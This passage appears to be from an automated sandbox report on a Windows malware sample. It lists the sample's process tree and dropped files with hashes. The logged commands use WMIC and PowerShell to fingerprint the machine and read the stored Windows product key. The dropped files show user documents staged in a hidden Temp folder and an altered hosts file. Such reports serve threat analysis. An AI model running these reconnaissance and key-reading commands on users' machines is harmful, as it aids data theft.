                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                              wmic os get Caption
                                                                              4⤵
                                                                                PID:4668
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                              3⤵
                                                                                PID:548
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic computersystem get totalphysicalmemory
                                                                                  4⤵
                                                                                    PID:920
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                  3⤵
                                                                                    PID:3004
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic csproduct get uuid
                                                                                      4⤵
                                                                                        PID:4740
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                      3⤵
                                                                                        PID:820
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1292
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                        3⤵
                                                                                          PID:2396
                                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                                            wmic path win32_VideoController get name
                                                                                            4⤵
                                                                                            • Detects videocard installed
                                                                                            PID:3808
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                          3⤵
                                                                                            PID:4940
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                              4⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:3172
                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                        1⤵
                                                                                          PID:1072

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                                                          SHA1

                                                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                          SHA256

                                                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                          SHA512

                                                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          944B

                                                                                          MD5

                                                                                          77d622bb1a5b250869a3238b9bc1402b

                                                                                          SHA1

                                                                                          d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                          SHA256

                                                                                          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                          SHA512

                                                                                          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          944B

                                                                                          MD5

                                                                                          a2c3a36333b0d9bad7cf9ffd177473e7

                                                                                          SHA1

                                                                                          922dfcf0128bcd2bbf2909240734a36e3a5a0ad1

                                                                                          SHA256

                                                                                          195465ccfd73606994e11f8dd18f20bb03c2b0e1ef16e220384a4400b14b1b9e

                                                                                          SHA512

                                                                                          224fbd71243cec3d974d76cbb6f534241f4f559f252d1d52f9df29b20fac452c2070a010b3a6b721703d8472b981bb2cb9480e37549a08a780464e5fb7085f1f

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          b7f97ee2bb5ef7400cbda2017f941e0c

                                                                                          SHA1

                                                                                          5007f1ae8221edaa5d5c8a9656f397638f4f3aa5

                                                                                          SHA256

                                                                                          4a04a07b41860bd8c5170a6927ba06a84cdebfe3a883bb2c1678c764ec827565

                                                                                          SHA512

                                                                                          3fbad6b1d5fde1025b7d3f01ef9ca3b69c6ad850e8a01f63474ada5a3d08b85f13543d32a72801de662cfbffaf58de6d45d8b6ad274d14725a1e347e75255b08

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          276798eeb29a49dc6e199768bc9c2e71

                                                                                          SHA1

                                                                                          5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                          SHA256

                                                                                          cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                          SHA512

                                                                                          0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                        • C:\Users\Admin\AppData\Local\Temp\RESA066.tmp

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          ef44a091a23402a046119e7fd842a0b6

                                                                                          SHA1

                                                                                          cdee1f1f116aab55ed37ebb70ea5e917c1020291

                                                                                          SHA256

                                                                                          5ae3991d4193f1286bc73f0484a5596be437c7cfe3e68ee6536a15fc75d9d8df

                                                                                          SHA512

                                                                                          42955e74023f40ab3e058d7346341b44fa94b480da2b6d1de19ee86b92bb8bfa44c26c5a134108138f16370cb036f78f738c5a0047d14d8af8e61d9a04e9eac4

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\VCRUNTIME140.dll

                                                                                          Filesize

                                                                                          117KB

                                                                                          MD5

                                                                                          862f820c3251e4ca6fc0ac00e4092239

                                                                                          SHA1

                                                                                          ef96d84b253041b090c243594f90938e9a487a9a

                                                                                          SHA256

                                                                                          36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

                                                                                          SHA512

                                                                                          2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_bz2.pyd

                                                                                          Filesize

                                                                                          49KB

                                                                                          MD5

                                                                                          e1b31198135e45800ed416bd05f8362e

                                                                                          SHA1

                                                                                          3f5114446e69f4334fa8cda9cda5a6081bca29ed

                                                                                          SHA256

                                                                                          43f812a27af7e3c6876db1005e0f4fb04db6af83a389e5f00b3f25a66f26eb80

                                                                                          SHA512

                                                                                          6709c58592e89905263894a99dc1d6aafff96ace930bb35abff1270a936c04d3b5f51a70fb5ed03a6449b28cad70551f3dccfdd59f9012b82c060e0668d31733

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_ctypes.pyd

                                                                                          Filesize

                                                                                          63KB

                                                                                          MD5

                                                                                          b6262f9fbdca0fe77e96a9eed25e312f

                                                                                          SHA1

                                                                                          6bfb59be5185ceaca311f7d9ef750a12b971cbd7

                                                                                          SHA256

                                                                                          1c0f9c3bdc53c2b24d5480858377883a002eb2ebb57769d30649868bfb191998

                                                                                          SHA512

                                                                                          768321758fc78e398a1b60d9d0ac6b7dfd7fd429ef138845461389aaa8e74468e4bc337c1db829ba811cb58cc48cfff5c8de325de949dde6d89470342b2c8ce8

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_decimal.pyd

                                                                                          Filesize

                                                                                          119KB

                                                                                          MD5

                                                                                          9cfb6d9624033002bc19435bae7ff838

                                                                                          SHA1

                                                                                          d5eecc3778de943873b33c83432323e2b7c2e5c2

                                                                                          SHA256

                                                                                          41b0b60fe2aa2b63c93d3ce9ab69247d440738edb4805f18db3d1daa6bb3ebff

                                                                                          SHA512

                                                                                          dd6d7631a54cbd4abd58b0c5a8cb5a10a468e87019122554467fd1d0669b9a270650928d9de94a7ec059d4acebf39fd1cfcea482fc5b3688e7924aaf1369cc64

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_hashlib.pyd

                                                                                          Filesize

                                                                                          36KB

                                                                                          MD5

                                                                                          0b214888fac908ad036b84e5674539e2

                                                                                          SHA1

                                                                                          4079b274ec8699a216c0962afd2b5137809e9230

                                                                                          SHA256

                                                                                          a9f24ad79a3d2a71b07f93cd56fc71958109f0d1b79eebf703c9ed3ac76525ff

                                                                                          SHA512

                                                                                          ae7aee8a11248f115eb870c403df6fc33785c27962d8593633069c5ff079833e76a74851ef51067ce302b8ea610f9d95c14be5e62228ebd93570c2379a2d4846

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_lzma.pyd

                                                                                          Filesize

                                                                                          87KB

                                                                                          MD5

                                                                                          adeaa96a07b7b595675d9f351bb7a10c

                                                                                          SHA1

                                                                                          484a974913276d236cb0d5db669358e215f7fced

                                                                                          SHA256

                                                                                          3e749f5fad4088a83ae3959825da82f91c44478b4eb74f92387ff50ff1b8647d

                                                                                          SHA512

                                                                                          5d01d85cda1597a00b39746506ff1f0f01eeea1dc2a359fcecc8ee40333613f7040ab6d643fdaee6adaa743d869569b9ab28ae56a32199178681f8ba4dea4e55

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_queue.pyd

                                                                                          Filesize

                                                                                          28KB

                                                                                          MD5

                                                                                          766820215f82330f67e248f21668f0b3

                                                                                          SHA1

                                                                                          5016e869d7f65297f73807ebdaf5ba69b93d82bd

                                                                                          SHA256

                                                                                          ef361936929b70ef85e070ed89e55cbda7837441acafeea7ef7a0bb66addeec6

                                                                                          SHA512

                                                                                          4911b935e39d317630515e9884e6770e3c3cdbd32378b5d4c88af22166b79b8efc21db501f4ffb80668751969154683af379a6806b9cd0c488e322bd00c87d0e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_socket.pyd

                                                                                          Filesize

                                                                                          45KB

                                                                                          MD5

                                                                                          65cd246a4b67cc1eab796e2572c50295

                                                                                          SHA1

                                                                                          053fa69b725f1789c87d0ef30f3d8997d7e97e32

                                                                                          SHA256

                                                                                          4ecd63f5f111d97c2834000ff5605fac61f544e949a0d470aaa467abc10b549c

                                                                                          SHA512

                                                                                          c5bf499cc3038741d04d8b580b54c3b8b919c992366e4f37c1af6321a7c984b2e2251c5b2bc8626aff3d6ca3bf49d6e1ccd803bd99589f41a40f24ec0411db86

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_sqlite3.pyd

                                                                                          Filesize

                                                                                          59KB

                                                                                          MD5

                                                                                          f018b2c125aa1ecc120f80180402b90b

                                                                                          SHA1

                                                                                          cf2078a591f0f45418bab7391c6d05275690c401

                                                                                          SHA256

                                                                                          67a887d3e45c8836f8466dc32b1bb8d64c438f24914f9410bc52b02003712443

                                                                                          SHA512

                                                                                          c57580af43bc1243c181d9e1efbc4aa544db38650c64f8ece42fbcbe3b4394fcadb7acfb83e27fbe4448113db1e6af8d894fb4bd708c460cf45c6524fcfdef96

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\_ssl.pyd

                                                                                          Filesize

                                                                                          68KB

                                                                                          MD5

                                                                                          309b1a7156ebd03474b44f11ba363e89

                                                                                          SHA1

                                                                                          8c09f8c65cac5bb1fcf43af65a7b3e59a9400990

                                                                                          SHA256

                                                                                          67ed13570c5376cd4368ea1e4c762183629537f13504db59d1d561385111fe0a

                                                                                          SHA512

                                                                                          e610a92f0e4fa2a6cd9afd7d8d7a32cc5df14e99af689bfb5a4b0811dca97114bf3fcf4bfae68600ed2417d18ee88c64c22b0c186068afd4731be1de90c06f15

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\base_library.zip

                                                                                          Filesize

                                                                                          1.3MB

                                                                                          MD5

                                                                                          18c3f8bf07b4764d340df1d612d28fad

                                                                                          SHA1

                                                                                          fc0e09078527c13597c37dbea39551f72bbe9ae8

                                                                                          SHA256

                                                                                          6e30043dfa5faf9c31bd8fb71778e8e0701275b620696d29ad274846676b7175

                                                                                          SHA512

                                                                                          135b97cd0284424a269c964ed95b06d338814e5e7b2271b065e5eabf56a8af4a213d863dd2a1e93c1425fadb1b20e6c63ffa6e8984156928be4a9a2fbbfd5e93

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\blank.aes

                                                                                          Filesize

                                                                                          116KB

                                                                                          MD5

                                                                                          2cb9ba9e1a6aed18e6f40bb87650408a

                                                                                          SHA1

                                                                                          e7ca6477d23f0d72feaf3de92097562e4974480f

                                                                                          SHA256

                                                                                          260fd7be1ba827cbd4509cdd5d751296b0b6b43f63ab6baf153c6dbb8e8f9930

                                                                                          SHA512

                                                                                          cc56049bf740be2e50a883017a8ae01f12f097d703fb2534783bd3936565ed4a6c6e86e9a500781cc121cfa2c6359f4316f29171290aaf60084e5ff060882704

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\libcrypto-3.dll

                                                                                          Filesize

                                                                                          1.6MB

                                                                                          MD5

                                                                                          8377fe5949527dd7be7b827cb1ffd324

                                                                                          SHA1

                                                                                          aa483a875cb06a86a371829372980d772fda2bf9

                                                                                          SHA256

                                                                                          88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

                                                                                          SHA512

                                                                                          c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\libffi-8.dll

                                                                                          Filesize

                                                                                          29KB

                                                                                          MD5

                                                                                          08b000c3d990bc018fcb91a1e175e06e

                                                                                          SHA1

                                                                                          bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                          SHA256

                                                                                          135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                          SHA512

                                                                                          8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\libssl-3.dll

                                                                                          Filesize

                                                                                          221KB

                                                                                          MD5

                                                                                          b2e766f5cf6f9d4dcbe8537bc5bded2f

                                                                                          SHA1

                                                                                          331269521ce1ab76799e69e9ae1c3b565a838574

                                                                                          SHA256

                                                                                          3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

                                                                                          SHA512

                                                                                          5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\python313.dll

                                                                                          Filesize

                                                                                          1.8MB

                                                                                          MD5

                                                                                          9a3d3ae5745a79d276b05a85aea02549

                                                                                          SHA1

                                                                                          a5e60cac2ca606df4f7646d052a9c0ea813e7636

                                                                                          SHA256

                                                                                          09693bab682495b01de8a24c435ca5900e11d2d0f4f0807dae278b3a94770889

                                                                                          SHA512

                                                                                          46840b820ee3c0fa511596124eb364da993ec7ae1670843a15afd40ac63f2c61846434be84d191bd53f7f5f4e17fad549795822bb2b9c792ac22a1c26e5adf69

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\rar.exe

                                                                                          Filesize

                                                                                          615KB

                                                                                          MD5

                                                                                          9c223575ae5b9544bc3d69ac6364f75e

                                                                                          SHA1

                                                                                          8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                          SHA256

                                                                                          90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                          SHA512

                                                                                          57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\rarreg.key

                                                                                          Filesize

                                                                                          456B

                                                                                          MD5

                                                                                          4531984cad7dacf24c086830068c4abe

                                                                                          SHA1

                                                                                          fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                          SHA256

                                                                                          58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                          SHA512

                                                                                          00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\select.pyd

                                                                                          Filesize

                                                                                          26KB

                                                                                          MD5

                                                                                          933da5361079fc8457e19adab86ff4e0

                                                                                          SHA1

                                                                                          51bccf47008130baadd49a3f55f85fe968177233

                                                                                          SHA256

                                                                                          adfdf84ff4639f8a921b78a2efce1b89265df2b512df05ce2859fc3cc6e33eff

                                                                                          SHA512

                                                                                          0078cd5df1b78d51b0acb717e051e83cb18a9daf499a959da84a331fa7a839eefa303672d741b29ff2e0c34d1ef3f07505609f1102e9e86fab1c9fd066c67570

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\sqlite3.dll

                                                                                          Filesize

                                                                                          645KB

                                                                                          MD5

                                                                                          ff62332fa199145aaf12314dbf9841a3

                                                                                          SHA1

                                                                                          714a50b5351d5c8afddb16a4e51a8998f976da65

                                                                                          SHA256

                                                                                          36e1c70afc8ad8afe4a4f3ef4f133390484bca4ea76941cc55bac7e9df29eefd

                                                                                          SHA512

                                                                                          eeff68432570025550d4c205abf585d2911e0ff59b6eca062dd000087f96c7896be91eda7612666905445627fc3fc974aea7c3428a708c7de2ca14c7bce5cca5

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI28762\unicodedata.pyd

                                                                                          Filesize

                                                                                          262KB

                                                                                          MD5

                                                                                          867ecde9ff7f92d375165ae5f3c439cb

                                                                                          SHA1

                                                                                          37d1ac339eb194ce98548ab4e4963fe30ea792ae

                                                                                          SHA256

                                                                                          a2061ef4df5999ca0498bee2c7dd321359040b1acf08413c944d468969c27579

                                                                                          SHA512

                                                                                          0dce05d080e59f98587bce95b26a3b5d7910d4cb5434339810e2aae8cfe38292f04c3b706fcd84957552041d4d8c9f36a1844a856d1729790160cef296dccfc2

                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_st5yhlim.hwa.ps1

                                                                                          Filesize

                                                                                          60B

                                                                                          MD5

                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                          SHA1

                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                          SHA256

                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                          SHA512

                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                        • C:\Users\Admin\AppData\Local\Temp\vzovoo2o\vzovoo2o.dll

                                                                                          Filesize

                                                                                          4KB

                                                                                          MD5

                                                                                          6b8d2db266ca6c1f1f547b91379b65bf

                                                                                          SHA1

                                                                                          79b6571a57cfba07c5b55451bb1bfba98073228b

                                                                                          SHA256

                                                                                          e06e3489c184fc4f8e5b9e280d00c8a29f288f846336d484b6c17cca55ba6311

                                                                                          SHA512

                                                                                          e6d7ab7241c77c5834204168d15225e4762298b6f80455ae4e130942f79023761d9a9eab32d38d7595aa513f7593b023db58ff9740687a4a36a3c0caf2dafbbe

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Desktop\HideReceive.docx

                                                                                          Filesize

                                                                                          19KB

                                                                                          MD5

                                                                                          543957be64123d7130113e2c774c4e66

                                                                                          SHA1

                                                                                          8c2a5ee2afc4eefefd72cbe6a9158d7da0865cd9

                                                                                          SHA256

                                                                                          987c2359d88c9a7539542dd29b7bb4731fb5e18b951cfc7b9d5dca8d58926f07

                                                                                          SHA512

                                                                                          66d87ecbef5bab76149428ea1504f9016c3828be214b8e0ddca72e76665c9b97a8f69d648c6aaaf88fd412aeb685b324a168c0150b713ffd3bc5c41ddb6e828c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Desktop\ReadWatch.docx

                                                                                          Filesize

                                                                                          15KB

                                                                                          MD5

                                                                                          9378fe1b57b8a29bfcea22071f726803

                                                                                          SHA1

                                                                                          e66a64b4f53bbe2967f33f8e6adbc5ac41cde66e

                                                                                          SHA256

                                                                                          8ae9866e1eae27587444c08bddf534fea99b74b4d70b5208b717c105388fdd1b

                                                                                          SHA512

                                                                                          0aca5669f2a7d816e806d9af24a9529c3ee038f2a676adb441ad4858020d7855e6b9248c4ceef22afa955d12df145406fd7ecaed628e060561293815b870cdcd

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Desktop\ResetResize.xlsx

                                                                                          Filesize

                                                                                          14KB

                                                                                          MD5

                                                                                          e78b232385d9a21af691b73cb6964c45

                                                                                          SHA1

                                                                                          9a5026c86cd50e11a1547784cf645e9c195e99b2

                                                                                          SHA256

                                                                                          334eacd973d34f6b6f748caf59703ed7b95a2935e7cada6dfce0b985ab338137

                                                                                          SHA512

                                                                                          1c6c8d83d09b2e79af66e3f15ad38e487ef6f18af211752e5c1bbb5609eface2eb0f5594eba982aa0587e011338e65d0733fadd2b8383d81ddcede87031a2907

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Documents\ConfirmSave.txt

                                                                                          Filesize

                                                                                          230KB

                                                                                          MD5

                                                                                          f8fc4c65bf5c0a16c33ff6961447969f

                                                                                          SHA1

                                                                                          ee7d50c52afde864edb6ec0493ca9fbec1beafed

                                                                                          SHA256

                                                                                          3c87f120a10346ed5d0902a384c67542b5f20799b0238dc815f927fab95c89ba

                                                                                          SHA512

                                                                                          864eb21072537c7ac5822565e00aa90cf4d0d5d4d11602ca0f6f3f7b1e0441cc2d0fd80d5c1065c02da24fa8df206b1f7993dbbb16a8d518b6b2b716e70be2fa

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Documents\FindExport.doc

                                                                                          Filesize

                                                                                          506KB

                                                                                          MD5

                                                                                          ec58588540f71fa2f76ab9ab9f6218a9

                                                                                          SHA1

                                                                                          2aaf6a93595f06bfd2c7942f1d12fbb1366fd00e

                                                                                          SHA256

                                                                                          c6d42468013e4c89af2866f2a2278cf5ec3cab84f4608a7f8aedb6949f7678fe

                                                                                          SHA512

                                                                                          dfc097b448218e99cb0ef6b7af76660b441df083e40a93b6cc2985a27b01c859dce4a27515ece2408fc330304eb8cf417c00e6ab0aaf96a83911257027176c93

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Documents\SkipCompress.xlsx

                                                                                          Filesize

                                                                                          9KB

                                                                                          MD5

                                                                                          14d52f4e10bff325972c74e30a3b956b

                                                                                          SHA1

                                                                                          b6275e239324da9bbeb5dd3a8bcfdfcc78fd1045

                                                                                          SHA256

                                                                                          586ae897b64569f88119c83bdb5c00efdab1f2c2bac407594a98d435d551a2c0

                                                                                          SHA512

                                                                                          0e30ac643005ce0569ae99f9e24a29635935821bc35bdb060d9df1a68d86f973fe3c4491b6dba357224ccba3bf0eb00b26b6721492f64827084ce7b64e9e58e7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Documents\TraceSend.pdf

                                                                                          Filesize

                                                                                          322KB

                                                                                          MD5

                                                                                          62319a7c5dd5a447b7ffa86cacdec506

                                                                                          SHA1

                                                                                          06ad6781bac660b7aa1f88f2c7470ab2c297da15

                                                                                          SHA256

                                                                                          87c85f4a250e258985511ca29e200f80bdce5a2a03dacfd5226f39b8c52af844

                                                                                          SHA512

                                                                                          12dbb422ec964f2fcecae486683a21d6497d740ecc4083095bd111b2c36148e052ba5b10e4fd3031248c00b5c79cdb48e2e3c341860c3b9cd50d6b2e97cf7fb6

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Documents\UnregisterGroup.docx

                                                                                          Filesize

                                                                                          483KB

                                                                                          MD5

                                                                                          c9eb03eaecf84abc2942f50bab6f312b

                                                                                          SHA1

                                                                                          a331722bfbcf2f50b2d9f3aecfce8d78fa9506f7

                                                                                          SHA256

                                                                                          69616fac0d8efee76a053123b567ebe564a441e9c8f0442a9a6c56e686c8a3b7

                                                                                          SHA512

                                                                                          ab5ff4c9939623f76dbd57d36665ff042fd821349ad83ec979af987491042b467d8bb84798fea8d5718410f6aedb8286fe31eccd2071eaf4aac58520e0302e07

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Documents\UpdateExpand.xlsx

                                                                                          Filesize

                                                                                          12KB

                                                                                          MD5

                                                                                          b92bd3400d0cb99ce33d1fdcf176948a

                                                                                          SHA1

                                                                                          f87fc9bd7f0d249fa846b90ef7c8d064f9047356

                                                                                          SHA256

                                                                                          71d8129524492208cf56250a6e3f9bc0332a179817413bca1eaf0582099512b6

                                                                                          SHA512

                                                                                          c9aa6f10b60d31b2093501c3ceb9f7a816869596e932bc242febc98f7fe8f1e11d7cccd0b5277a457084ff0afd05434fa9be884fbd72d3dc4a220333a7034640

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Downloads\BackupExpand.mht

                                                                                          Filesize

                                                                                          1.6MB

                                                                                          MD5

                                                                                          fb9f68801b0cb4f5163888d655fb9978

                                                                                          SHA1

                                                                                          1a34c122e8ce6dc779a6865261786fccab583a4d

                                                                                          SHA256

                                                                                          3ee053072a1e4917d4084da22efe781f360bdb4892a383304575caabe387784c

                                                                                          SHA512

                                                                                          fc6eeac561e6a01795ffdbcb33608a739807861e38e1f8d6b1ebaef1242f0986470c2c8dc0e7ca06789db62e0b126b3532abc3717a815fcef665047abdadcb76

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Downloads\BlockRestore.mp4

                                                                                          Filesize

                                                                                          971KB

                                                                                          MD5

                                                                                          a462a95726d053c9bb48d11d0c41cd96

                                                                                          SHA1

                                                                                          7fd97de939594978efd7168a65cc4161487ae5fe

                                                                                          SHA256

                                                                                          b27af751b935ac666061c166523aa77b2b54cc176fa92026235ff5db4a5dc30b

                                                                                          SHA512

                                                                                          98e2444104c205dc78a578791f2a4ca61b2b3deae6dd215ec4211657e04b9ee70cc5a5a40c0bfca712beef0c8816cc4b276400064cdc40e027894e41d16e21b4

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍​    ‎   \Common Files\Downloads\HideRequest.docx

                                                                                          Filesize

                                                                                          713KB

                                                                                          MD5

                                                                                          aca00e1a9a17343363aaeca335475d4d

                                                                                          SHA1

                                                                                          8391e2116a64f2c6520852ae208b08f0ed66035f

                                                                                          SHA256

                                                                                          cce92a89fe7ba88b985f6b75e8317112cd971536be026f969ece9700145bedd7

                                                                                          SHA512

                                                                                          f1d9f8f04a198f978e1f3c11c9f373337de989a2ca449b51d9ebc62b5e800d8606e240e60c0a0f697eb6c70f815349d873a7778423bda12cef2e3c6c33e43627

                                                                                        • C:\Windows\System32\drivers\etc\hosts

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                          SHA1

                                                                                          e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                          SHA256

                                                                                          a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                          SHA512

                                                                                          c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\vzovoo2o\CSC156940F976C04C4D8E81A5770BD9ABC.TMP

                                                                                          Filesize

                                                                                          652B

                                                                                          MD5

                                                                                          c6050e16e632319dea7bf92da80a592c

                                                                                          SHA1

                                                                                          13fc01c598b3fca256110a6fe37930b8ce026187

                                                                                          SHA256

                                                                                          1bd513dcd445a263db7ec54d20a97dd611344e7ad5d79912b87d2ef03e02b8aa

                                                                                          SHA512

                                                                                          066d0a7719309e99b1d9d98b59a5d1267c454633f75d17d13b34a015a194a222ed64c03ebfe84a8865b52957f66f7a888d70a474189e92327c24c9a3fa464ee8

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\vzovoo2o\vzovoo2o.0.cs

                                                                                          Filesize

                                                                                          1004B

                                                                                          MD5

                                                                                          c76055a0388b713a1eabe16130684dc3

                                                                                          SHA1

